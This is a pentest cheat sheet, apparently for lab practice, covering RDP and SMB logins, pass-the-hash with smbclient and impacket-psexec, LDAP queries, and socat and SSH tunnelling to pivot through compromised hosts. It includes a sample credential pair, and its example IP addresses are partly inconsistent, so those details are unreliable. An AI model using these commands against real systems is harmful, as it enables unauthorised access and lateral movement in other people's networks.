Windows
RDP
# xfreerdp (note: a password given on the command line ends up in shell history and in process listings)
xfreerdp /v:<ip> /u:<username> /p:<password> +clipboard
# xfreerdp with file share
xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/home/kali/share/ +clipboard
# xfreerdp with domain
xfreerdp /v:10.10.235.58 /u:philip /p:Claire2008 /d:THM +clipboard
# alt
xfreerdp /v:<ip> /u:<DOMAIN>\<username> /p:<password> +clipboard
# rdesktop
rdesktop -u <username> -p <password> <ip>
SMB
# Share Access - Windows
smbclient \\\\10.10.10.10\\foldername -U Username -P Password
# Pass-the-Hash
smbclient \\\\10.10.10.10\\foldername -U Username --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
# Pass-the-Hash
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@10.10.10.10
LDAP
# simple-bind (-x) search starting at the given base DN (-b)
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=local"
SSH
# basic connection
ssh user@<ip>
# connect with a private key file (a key, not a certificate)
#ssh -i id_rsa user@<ip>
SCP
# pull a file
scp user@<ip>:/path/to/file.ext .
# push a file
scp file.ext user@10.10.10.10:/home/file.txt
Port Forwarding
Socat
# on compromised machine
socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22
SSH Tunnel [ Local ]
# listen on all interfaces (0.0.0.0 exposes the listener to anyone who can reach this host), pick a port.
# forward to target ip:port
# using creds
# format LOCAL_IP:LOCAL_PORT:DEST_IP:DEST_PORT
ssh -N -L 0.0.0.0:4444:10.10.10.10:5555 user@20.20.20.20
ssh -N -L 0.0.0.0:4455:172.16.50.217:445 admin@10.4.50.215
# user@20.20.20.20 is the SSH server the tunnel is built through, not the endpoint
# 10.10.10.10 is the final endpoint, not the SSH server
# to reach the endpoint, connect to the SSH client's bind address and local port (here 0.0.0.0:4444 on the host running ssh)
-------------------------------------------------------------------------------
# Example: SSH Tunnel, commands run from kali, ssh tunneled through the foothold and the pivot, landing on the target.
kali -> foothold -> pivot -> target
Kali:127.0.0.1
Foothold:192.168.50.63 [ ssh client ]
Pivot:10.4.50.215 [ ssh server ]
Target:172.16.50.216
# On Foothold - 192.168.50.63:
ssh -N -L 0.0.0.0:4242:172.16.50.217:4242 admin@10.4.50.215
# The entry point is the listener on 192.168.244.63:
kali$ ./ssh_local_client -i 192.168.244.63 -p 4242
SSH Tunnel [ Dynamic ]
# same setup as above, run on the foothold; -D opens a SOCKS proxy on port 9999:
ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215
# tail of /etc/proxychains4.conf
# socks5 192.168.50.63 9999
SSH Tunnel [ Remote ]
ssh -R [remote_host:remote_port]:[local_host]:[local_port] user@remote_machine
# Run on the foothold: opens 127.0.0.1:2345 on kali and forwards it to 10.4.50.215:5432
ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.50.4